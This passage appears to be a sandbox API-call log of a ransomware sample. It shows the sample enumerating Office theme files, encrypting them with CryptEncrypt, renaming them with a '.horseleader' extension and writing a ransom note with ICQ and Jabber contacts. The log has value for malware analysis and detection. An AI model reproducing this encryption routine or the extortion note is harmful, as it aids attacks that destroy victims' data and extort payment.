lpNewFilePointer=0xffffffff) returned 1 [0245.991] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x22b, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: 
lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x22b, lpOverlapped=0x0) returned 1 [0245.991] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.991] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0245.992] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0245.992] CloseHandle (hObject=0x1a4) returned 1 [0245.992] GetProcessHeap () returned 0x780000 [0245.992] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0245.992] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.INF.horseleader") returned 93 [0245.992] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\aftrnoon.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\aftrnoon.inf.horseleader")) returned 1 [0245.996] GetProcessHeap () returned 0x780000 [0245.996] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0245.996] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85b50300, ftCreationTime.dwHighDateTime=0x1c43125, ftLastAccessTime.dwLowDateTime=0x6d05ead0, 
ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x85b50300, ftLastWriteTime.dwHighDateTime=0x1c43125, nFileSizeHigh=0x0, nFileSizeLow=0x621, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0245.996] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0245.996] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 80 [0245.996] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0245.996] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0245.996] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0245.997] lstrlenW (lpString=".testttjffg") returned 11 [0245.997] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0245.997] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0245.997] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0245.997] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0245.998] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 80 [0245.998] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0245.998] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: 
lpFileSize=0x32aeb58*=1569) returned 1 [0245.998] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x621, lpOverlapped=0x0) returned 1 [0246.001] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff9df, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.001] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x621, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x621, lpOverlapped=0x0) returned 1 [0246.001] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.001] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.001] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.001] CloseHandle (hObject=0x1a4) returned 1 [0246.002] GetProcessHeap () returned 0x780000 [0246.002] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.002] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF.horseleader") returned 92 [0246.002] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\preview.gif.horseleader")) returned 1 [0246.003] GetProcessHeap () returned 0x780000 [0246.003] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.003] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86e63000, ftCreationTime.dwHighDateTime=0x1c43125, ftLastAccessTime.dwLowDateTime=0x5ad12690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x86e63000, ftLastWriteTime.dwHighDateTime=0x1c43125, nFileSizeHigh=0x0, nFileSizeLow=0x6292, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0246.003] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0246.003] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 81 [0246.003] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0246.003] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0246.003] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0246.003] lstrlenW (lpString=".testttjffg") returned 11 [0246.004] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0246.004] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.004] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.004] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.005] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 81 [0246.005] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0246.006] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=25234) returned 1 [0246.006] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.009] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.010] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.010] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1292, lpOverlapped=0x0) returned 1 [0246.010] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffed6e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.010] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1292, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1292, lpOverlapped=0x0) returned 1 [0246.011] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, 
lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.011] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.011] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.011] CloseHandle (hObject=0x1a4) returned 1 [0246.011] GetProcessHeap () returned 0x780000 [0246.011] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.011] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG.horseleader") returned 93 [0246.012] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png.horseleader")) returned 1 [0246.013] GetProcessHeap () returned 0x780000 [0246.013] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.013] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86e63000, ftCreationTime.dwHighDateTime=0x1c43125, ftLastAccessTime.dwLowDateTime=0x5ad12690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x86e63000, ftLastWriteTime.dwHighDateTime=0x1c43125, nFileSizeHigh=0x0, nFileSizeLow=0x6292, 
dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0246.013] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0246.013] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\#Decrypt#.txt") returned 82 [0246.013] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0246.014] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0246.014] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0246.015] lstrlenA (lpString="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") returned 1368 [0246.015] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0246.015] CloseHandle (hObject=0x158) returned 1 [0246.015] GetProcessHeap () returned 0x780000 [0246.015] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0246.015] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5146e3d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ARCTIC", cAlternateFileName="")) returned 1 [0246.015] lstrcmpiW (lpString1="ARCTIC", lpString2="Windows") returned -1 [0246.015] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC") returned 66 [0246.015] lstrcmpW (lpString1="ARCTIC", lpString2=".") returned 1 [0246.015] lstrcmpW (lpString1="ARCTIC", lpString2="..") returned 1 [0246.016] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0246.016] GetProcessHeap () returned 0x780000 [0246.016] RtlAllocateHeap 
(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0246.016] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\*") returned 68 [0246.016] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5146e3d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0246.017] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0246.017] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\.") returned 68 [0246.017] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0246.017] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5146e3d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0246.018] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0246.018] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\..") returned 69 [0246.018] lstrcmpW (lpString1="..", lpString2=".") returned 1 
[0246.018] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0246.018] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc081900, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x5146e3d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdc081900, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0x10fc7, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="ARCTIC.ELM", cAlternateFileName="")) returned 1 [0246.018] lstrcmpiW (lpString1="ARCTIC.ELM", lpString2="Windows") returned -1 [0246.018] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.ELM") returned 77 [0246.018] StrStrIW (lpFirst="ARCTIC.ELM", lpSrch=".horseleader") returned 0x0 [0246.018] lstrcmpW (lpString1="ARCTIC.ELM", lpString2="#Decrypt#.txt") returned 1 [0246.018] lstrcmpW (lpString1="ARCTIC.ELM", lpString2="_uninstalling_.png") returned 1 [0246.018] lstrlenW (lpString=".testttjffg") returned 11 [0246.018] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.ELM", lpSrch=".testttjffg") returned 0x0 [0246.018] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.018] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.018] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\arctic.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0x1a4 [0246.020] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.ELM") returned 77 [0246.020] StrStrW (lpFirst="ARCTIC.ELM", lpSrch=".txt") returned 0x0 [0246.020] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=69575) returned 1 [0246.020] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.020] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.035] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.035] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.036] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x5fe3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.036] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.036] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.036] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.037] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xbfc7, 
lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.037] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.037] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.037] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.038] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.038] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.039] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.039] CloseHandle (hObject=0x1a4) returned 1 [0246.039] GetProcessHeap () returned 0x780000 [0246.040] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.040] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.ELM.horseleader") returned 89 [0246.040] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\arctic.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common 
